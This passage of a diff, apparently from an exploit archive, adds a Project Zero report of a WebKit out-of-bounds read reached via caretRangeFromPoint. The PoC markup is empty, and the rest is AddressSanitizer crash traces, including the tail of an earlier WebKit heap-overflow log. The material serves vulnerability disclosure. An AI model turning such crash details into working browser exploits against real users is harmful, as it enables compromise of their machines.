(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #53 0x1063046d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #54 0x106303bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #55 0x105af5117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #56 0x1058d4695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #57 0x1058dda48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #58 0x11d070842 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d22842) + #59 0x11d0711b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #60 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #61 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #62 0x7fffd528f715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #63 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #64 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #65 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #66 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #67 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #68 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #69 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #70 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #71 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #72 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #73 0x1057d356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #74 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x6030000f5de6 is located 0 bytes to the right of 22-byte region [0x6030000f5dd0,0x6030000f5de6) +allocated by thread T0 here: + #0 0x108a3fd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11d0c0ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11d0bed6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11d045247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11d04463a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x11d080ff8 in WTF::Ref WTF::StringImpl::createUninitializedInternalNonEmpty(unsigned int, unsigned short*&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d32ff8) + #7 0x11d07f8f3 in WTF::Ref WTF::StringImpl::createInternal(unsigned short const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d318f3) + #8 0x11d07f80d in WTF::StringImpl::create(unsigned short const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d3180d) + #9 0x11d0b2188 in WTF::String::String(unsigned short const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d64188) + #10 0x1107e1afc in WTF::NeverDestroyed::NeverDestroyed(unsigned short const*&&, int&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8f0afc) + #11 0x112523429 in WebCore::RenderCombineText::combineText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2632429) + #12 0x112014105 in WebCore::BreakingContext::handleText(WTF::Vector&, bool&, unsigned int&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2123105) + #13 0x112011929 in WebCore::LineBreaker::nextLineBreak(WebCore::BidiResolverWithIsolate&, WebCore::LineInfo&, WebCore::LineLayoutState&, WebCore::RenderTextInfo&, WebCore::FloatingObject*, unsigned int, WTF::Vector&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2120929) + #14 0x1124a67c1 in WebCore::RenderBlockFlow::layoutRunsAndFloatsInRange(WebCore::LineLayoutState&, WebCore::BidiResolverWithIsolate&, WebCore::InlineIterator const&, WebCore::BidiStatus const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25b57c1) + #15 0x1124a49f5 in WebCore::RenderBlockFlow::layoutRunsAndFloats(WebCore::LineLayoutState&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25b39f5) + #16 0x1124ab383 in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25ba383) + #17 0x1124725f7 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25815f7) + #18 0x11242caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #19 0x112477a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #20 0x1124741c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #21 0x112472602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #22 0x11242caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #23 0x112477a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #24 0x1124741c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #25 0x112472602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #26 0x11242caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #27 0x112477a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #28 0x1124741c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #29 0x112472602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574) in WTF::StringImpl::at(unsigned int) const +Shadow bytes around the buggy address: + 0x1c060001eb60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd + 0x1c060001eb70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd + 0x1c060001eb80: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa + 0x1c060001eb90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd + 0x1c060001eba0: fa fa 00 00 00 00 fa fa fd fd fd fd fa fa fd fd +=>0x1c060001ebb0: fd fd fa fa fd fd fd fd fa fa 00 00[06]fa fa fa + 0x1c060001ebc0: fd fd fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa + 0x1c060001ebd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 + 0x1c060001ebe0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa + 0x1c060001ebf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa + 0x1c060001ec00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30388==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43171.js b/platforms/multiple/dos/43171.js new file mode 100644 index 000000000..27c1dece2 --- /dev/null +++ b/platforms/multiple/dos/43171.js @@ -0,0 +1,149 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1349 + +There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + +
+ +
+
+ + + +/* +================================================================= + +ASan log: + +================================================================= +==30436==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000560c48 at pc 0x00010c8f583a bp 0x7fff5c1a8e70 sp 0x7fff5c1a8e68 +READ of size 4 at 0x606000560c48 thread T0 +==30436==WARNING: invalid path to external symbolizer! +==30436==WARNING: Failed to use and restart external symbolizer! + #0 0x10c8f5839 in WebCore::SimpleLineLayout::RunResolver::Run::logicalLeft() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba4839) + #1 0x10c8fd2cb in WebCore::SimpleLineLayout::RunResolver::runForPoint(WebCore::LayoutPoint const&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bac2cb) + #2 0x10c8f533f in WebCore::SimpleLineLayout::textOffsetForPoint(WebCore::LayoutPoint const&, WebCore::RenderText const&, WebCore::SimpleLineLayout::Layout const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba433f) + #3 0x10c635a06 in WebCore::RenderText::positionForPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28e4a06) + #4 0x10c2f5080 in WebCore::RenderBlockFlow::positionForPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25a4080) + #5 0x10a4e350a in WebCore::Document::caretRangeFromPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79250a) + #6 0x10a4e3301 in WebCore::Document::caretRangeFromPoint(int, int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x792301) + #7 0x10b0fb98b in WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13aa98b) + #8 0x10b0e0c28 in long long WebCore::IDLOperation::call<&(WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x138fc28) + #9 0x4f28e9401027 () + #10 0x11825fe49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #11 0x11825fe49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #12 0x118258f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #13 0x117ebc847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #14 0x117e3d88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #15 0x117456731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #16 0x1174569a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #17 0x117456d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #18 0x10af8f615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #19 0x10b3a26cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #20 0x10a70e010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #21 0x10a70dae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #22 0x10a6d5b97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97) + #23 0x10a6d6b2f in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985b2f) + #24 0x10a6d6553 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985553) + #25 0x10cc0d5f2 in WebCore::SVGSMILElement::dispatchPendingEvent(WebCore::EventSender*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ebc5f2) + #26 0x10cc0d92a in WebCore::EventSender::dispatchPendingEvents() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ebc92a) + #27 0x10ccfd242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) + #28 0x10bebbe74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) + #29 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) + #30 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) + #31 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) + #32 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) + #33 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #34 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #35 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #36 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #37 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #38 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #39 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #40 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #41 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #42 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #43 0x103a5356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #44 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x606000560c48 is located 8 bytes to the right of 64-byte region [0x606000560c00,0x606000560c40) +allocated by thread T0 here: + #0 0x103abbd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x118927ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x118925d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x1188ac247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x1188ab63a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x10c8e7fdc in WebCore::SimpleLineLayout::Layout::create(WTF::Vector const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b96fdc) + #7 0x10c8e78ff in WebCore::SimpleLineLayout::create(WebCore::RenderBlockFlow&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b968ff) + #8 0x10c2d8cb5 in WebCore::RenderBlockFlow::layoutSimpleLines(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2587cb5) + #9 0x10c2d25f7 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25815f7) + #10 0x10c28caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #11 0x10c2d7a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #12 0x10c2d41c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #13 0x10c2d2602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #14 0x10c28caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #15 0x10c2d7a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #16 0x10c2d41c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #17 0x10c2d2602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #18 0x10c28caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #19 0x10c2d7a3c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2586a3c) + #20 0x10c2d41c2 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25831c2) + #21 0x10c2d2602 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2581602) + #22 0x10c28caa2 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x253baa2) + #23 0x10c69168d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294068d) + #24 0x10c6920b4 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29410b4) + #25 0x10a8d526d in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8426d) + #26 0x10a4e1b10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) + #27 0x10cd35b2f in WebCore::absolutePointIfNotClipped(WebCore::Document&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fe4b2f) + #28 0x10cd35809 in WebCore::TreeScope::nodeFromPoint(WebCore::LayoutPoint const&, WebCore::LayoutPoint*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fe4809) + #29 0x10a4e349b in WebCore::Document::caretRangeFromPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79249b) + +SUMMARY: AddressSanitizer: 